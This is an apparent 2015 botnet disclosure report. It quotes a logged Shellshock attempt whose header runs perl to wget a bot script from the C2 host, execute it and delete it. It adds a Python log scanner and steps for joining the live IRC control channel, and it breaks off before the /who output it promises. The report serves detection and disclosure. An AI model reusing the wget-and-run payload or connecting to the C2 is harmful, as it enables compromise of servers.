irc botnet disclosure 08/JAN/2015

Posted by a guest, Jan 8th, 2015
 _____________________________________
[```` BOTNET INVESTIGATION REPORT ````]
 `````````````````````````````````````

Date: January 08, 2015
Botnet type: IRC Bots/Malware
Botnet control server IP: 212.227.55.192   (1&1 Internet AG)
Protocol: IRC
Port: 444
Hacked hosts: >500
Previous report of the same botnet: http://pastebin.com/DabxDiwm

Screenshot proofs:
  1] http://i.imgur.com/ppovvBo.png  (command /lusers)
  2] http://i.imgur.com/Arbygom.png  ( some bots )
  3] http://i.imgur.com/LWVeDjT.png  ( shows how many channels admin has )

The following access.log record was found today on my web server:
....
82.165.11.172 - - [08/Jan/2015:09:15:36 -0500] "GET /phppath/cgi_wrapper HTTP/1.1" 404 162 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESSX\x22;system(\x22wget http://212.227.55.192/android.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\x22);'"
....

This is clearly a Shellshock exploitation attempt (the User-Agent header carries a Bash function definition followed by commands), and the payload it downloads is here:
 http://212.227.55.192/android.txt   ( MIRROR: http://pastebin.com/jk6aqUd8 )
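As an added example (not part of the original paste), a small Python scanner that turns the observation above into a repeatable check over combined-format access logs: it parses each record, undoes Apache's \xHH escaping, flags the Shellshock function-definition marker in the User-Agent or Referer header, and extracts the stage-2 download URL and host as indicators for blocking. The sample log is constructed from the record quoted above plus one benign request.

```python
import re

# Combined log format (Apache/nginx): client ident user [time] "request"
# status bytes "referer" "user-agent".
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# Shellshock trigger: a Bash function definition "() {" smuggled into a
# request header that a CGI handler exports as an environment variable.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
URL_RE = re.compile(r'https?://[^\s"\'<>;)]+')

# Constructed sample: the access.log record quoted in the report, followed
# by an ordinary request so the scanner has a negative case.
SAMPLE_LOG = r'''
82.165.11.172 - - [08/Jan/2015:09:15:36 -0500] "GET /phppath/cgi_wrapper HTTP/1.1" 404 162 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESSX\x22;system(\x22wget http://212.227.55.192/android.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\x22);'"
203.0.113.9 - - [08/Jan/2015:09:16:01 -0500] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''.strip().splitlines()


def unescape_apache(field):
    """Undo Apache's \\xHH escaping so the header reads as the client sent it."""
    return re.sub(r'\\x([0-9A-Fa-f]{2})', lambda m: chr(int(m.group(1), 16)), field)


def scan_line(line):
    """Return a finding dict for a Shellshock attempt on this line, else None."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    for header in ("ua", "ref"):  # the trigger can sit in any logged header
        payload = unescape_apache(m.group(header))
        if not SHELLSHOCK_RE.search(payload):
            continue
        urls = URL_RE.findall(payload)
        req = m.group("req").split()
        return {
            "src_ip": m.group("ip"),
            "time": m.group("ts"),
            "path": req[1] if len(req) > 1 else m.group("req"),
            "header": header,
            "urls": urls,
            # Stage-2 download hosts: the dropper/C2 indicators to block.
            "hosts": sorted({u.split("/")[2] for u in urls}),
        }
    return None


def scan(lines):
    return [f for f in map(scan_line, lines) if f]
```

Run `scan()` over a real log file's lines; each finding carries the source IP, requested CGI path and the download host, which is what you need for a block rule and for checking whether /tmp/bot.pl ever appeared on the host.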

From the source code we can clearly see that this is an IRC bot that connects to the following server:
$servidor='212.227.55.192' unless $servidor;
my $porta='444';

Type /server 212.227.55.192 444   in your IRC client and you will see some channels and many hacked hosts exploited through this vulnerability and controlled by this bot.
Then type /join #sec   to join the botnet control channel.

We see the admin, under the nick X, as a channel operator in #sec.
Run /lusers and we can see the number of bots:
* There are 0 users and 500 invisible on 1 servers
* 2 :operator(s) online
* 4 :unknown connection(s)
* 12 :channels formed
* I have 500 clients and 0 servers
* 500 1018 :Current local users 500, max 1018
* 500 500 :Current global users 500, max 500

Here is some /who output, so we can see the cloaked hosts of the hacked servers and their kernel version (uname -r):